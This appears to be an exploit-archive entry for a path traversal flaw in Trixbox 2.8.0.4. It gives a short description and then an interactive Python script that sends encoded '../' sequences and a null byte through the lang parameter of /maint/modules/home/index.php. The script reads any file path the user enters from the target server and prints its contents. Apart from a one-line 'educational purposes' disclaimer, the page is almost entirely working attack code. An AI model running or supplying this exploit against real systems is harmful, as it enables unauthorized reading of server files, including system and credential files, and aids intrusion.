Trixbox 2.8.0.4 lang path traversal Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-05-28 |
Type : webapps |
Platform : php
This exploit / vulnerability Trixbox 2.8.0.4 lang path traversal is for educational purposes only and if it is used you will do on your own risk!
'''
Description:
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
lang parameter to /maint/modules/home/index.php.
'''
# Constructing malicious link (payload):
base_link = 'http://' + target_ip + ':' + target_port
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
base_link_addon_3 = '%00english'
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')
'''
EXPLOIT:
'''
while base_link_addon_2 != 'EXIT':
base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
print('')
exploit = requests.post(exploit_link, headers=header)
print('Contents of ' + base_link_addon_2 + ':')
for data in exploit.iter_lines():
data = data.decode('utf-8')
if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
print(data)
else:
break
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')